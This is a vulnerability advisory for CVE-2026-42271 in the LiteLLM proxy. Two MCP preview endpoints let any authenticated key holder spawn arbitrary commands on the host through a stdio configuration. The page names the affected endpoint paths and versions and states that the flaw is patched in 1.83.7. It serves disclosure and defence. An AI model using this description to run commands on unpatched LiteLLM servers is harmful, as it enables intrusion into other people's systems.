Home

Description

LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege internal-user keys — could therefore run arbitrary commands on the host. This issue has been patched in version 1.83.7.

PUBLISHED Reserved 2026-04-26 | Published 2026-05-08 | Updated 2026-05-08 | Assigner GitHub_M




HIGH: 8.7CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N

Problem types

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Product status

>= 1.74.2, < 1.83.7
affected

References

github.com/...itellm/security/advisories/GHSA-v4p8-mg3p-g94g

github.com/BerriAI/litellm/releases/tag/v1.83.7-stable

cve.org (CVE-2026-42271)

nvd.nist.gov (CVE-2026-42271)

Download JSON